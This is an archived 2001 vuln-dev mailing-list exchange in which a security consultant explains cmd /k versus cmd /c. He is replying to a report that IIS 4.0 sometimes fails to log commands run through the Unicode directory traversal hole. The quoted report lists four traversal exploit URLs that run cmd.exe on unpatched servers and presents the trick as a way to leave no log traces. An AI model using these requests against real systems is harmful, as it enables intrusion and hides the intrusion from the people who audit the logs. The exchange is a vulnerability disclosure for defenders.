
From: Pablo Aravena (p.aravena@bysecure.com)
Date: Thu Dec 20 2001 - 07:48:45 CST


    The problem looks like this:

            CMD /K [command]  Execute the command and then stay active
            CMD /C [command]  Execute the command and then terminate

            If you issue a cmd.exe?/k request, the process stays active until
            it has finished, unlike a cmd.exe?/c request, which terminates the
            process immediately. Because of this, IIS does not log a process
            that has not yet come to an end.
                    

    Sincerely,
    Pablo Aravena Martínez
    Security Consultant
    BYSECURE CSE S.A.
    PGP FingerPrint: 4109 41C1 A295 75D8 F159 D542 96C5 5E6D 2B08 F28A
    http://www.bysecure.com
    mailto:p.aravena@bysecure.com

    > -----Original Message-----
    > From: ThEye [SMTP:theye@350cc.com]
    > Sent: Thursday, December 20, 2001 0:39
    > To: vuln-dev@securityfocus.com
    > CC: ndr113@350cc.com
    > Subject: sometimes IIS 4.0 don't write logs.
    >
    > Hi:
    >
    > I don't know if this problem is documented, but I didn't find anything
    > about it anywhere.
    >
    > The problem is the following one:
    >
    > + Problem:
    > When I was playing with "Microsoft IIS and PWS Extended Unicode Directory
    > Traversal Vulnerability" ( BugtraqID = 1806 ) I found that if the
    > attacker uses the "k" option of cmd ( cmd /k ) instead of the "c" option
    > ( cmd /c ), IIS 4.0 (with the Extended Unicode Directory Traversal
    > Vulnerability) sometimes doesn't write logs of the attacker's activity.
    >
    > + Implications:
    > If an attacker uses this vulnerability to crack a web page or anything,
    > eventually no tracks will exist on the attacked server.
    >
    > + Final:
    > In PROBLEM I said "sometimes" because after a high number of requests to
    > "cmd /k", IIS 4.0 writes logs of some requests; still, I don't know when
    > and why IIS 4.0 writes logs of the "cmd /k" request.
    > Anyone who can confirm or refute this, please post it.
    >
    >
    > + Exploit:
    > I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed
    > ( without any patch ).
    >
    > http://server.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/k+dir
    > http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
    > http://server.com/msadc/..%c1%1c../winnt/system32/cmd.exe?/k+dir
    > http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir
    >
    > Result: No tracks on log files.
    >
    > + More Information:
    > 1) Microsoft IIS and PWS Extended Unicode Directory Traversal
    >
    > http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
    > 2) Microsoft Patch prmcan4i
    >
    > http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4i.exe
    >
    > Roberto Alamos M. (theye@350cc.com)
    > www.350cc.com